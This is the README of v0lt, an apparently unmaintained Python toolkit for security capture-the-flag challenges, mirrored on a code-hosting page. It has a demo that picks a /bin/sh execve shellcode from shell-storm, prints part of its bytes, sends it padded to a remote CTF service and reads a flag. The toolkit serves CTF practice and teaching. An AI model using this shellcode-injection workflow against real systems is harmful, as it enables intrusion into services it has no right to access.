# v0lt **Repository Path**: chnming/v0lt ## Basic Information - **Project Name**: v0lt - **Description**: mirror from https://github.com/P1kachu/v0lt - **Primary Language**: Unknown - **License**: Not specified - **Default Branch**: master - **Homepage**: None - **GVP Project**: No ## Statistics - **Stars**: 0 - **Forks**: 0 - **Created**: 2024-07-30 - **Last Updated**: 2024-07-30 ## Categories & Tags **Categories**: Uncategorized **Tags**: None ## README ![v0lt](https://raw.githubusercontent.com/P1kachu/v0lt/master/v0lt/assets/v0lt.png) v0lt ==== [![Rawsec's CyberSecurity Inventory](http://list.rawsec.ml/img/badges/Rawsec-inventoried-FF5050_flat-square.svg)](http://list.rawsec.ml/tools.html#v0lt) v0lt is an attempt to regroup every tool I used/use/will use in security CTF, Python style. A lot of exercises were solved using bash scripts but Python may be more flexible, that's why. Nothing to do with Gallopsled. It's a toy toolkit, with small but specific utils only. This project is not maintained anymore, since the utils themselves are small enough to work almost all the time without the need of maintaining anything. Feel free to submit PRs if you want however :) ## Requirements and Installation #### Dependencies: * Libmagic * Python3 * BeautifulSoup * Requests * filemagic * hexdump * passlib #### Installation: ```Bash # for v0lt install git clone https://github.com/P1kachu/v0lt.git cd v0lt [sudo] python3 setup.py install # sudo is required for potentially missing dependencies ``` ## Demo: Shellcodes ```Python >>> from v0lt import * >>> nc = Netcat("archpichu.ddns.net", 65102) Connected to port 65102 >>> print(nc.read()) GIVE ME SHELLCODZ >>> shellhack = ShellCrafter(4096, "bin","execve") >>> shellhack.get_shellcodes(shellhack.keywords) ...... 85: Linux/x86:setuid(0) & execve(/sbin/poweroff -f) - 47 bytes 86: Linux/x86:execve (/bin/sh) - 21 Bytes 87: Linux/x86:break chroot execve /bin/sh - 80 bytes 88: Linux/x86:execve(/bin/sh,0,0) - 21 bytes ...... Selection: 86 Your choice: http://shell-storm.org/shellcode/files/shellcode-752.php Shellcode: "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62[...]" >>> nc.shellcat(shellhack.shellcode) >>> nc.writeln(shellhack.pad()) >>> exploit = nc.dialogue("cat flag", 3) >>> print(exploit) AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA: File name too long P1kaCTF{sh3llc0de_1s_e4zY} ``` ## Implemented: * Crypto * Base64 * Ceasar shift * Hashing functions (SHA, MD5) * Bits manipulations (XOR, inverse XOR) * Usual conversions (bytes, strings, hex) * RSA basics (inverse modulo, inverse power, egcd...) * Bruteforcing (Dictionnary, custom word) * Shellcodes * Shellcode selection and download from Shell-storm repo * Shellcode formater * Shell{cat,net}: Sending shellcode made easy * Automatic padding * Easy connection support * Netcat * Telnet * Solving * Instruction Counting bruteforcer And more Examples are available ![here](./examples/)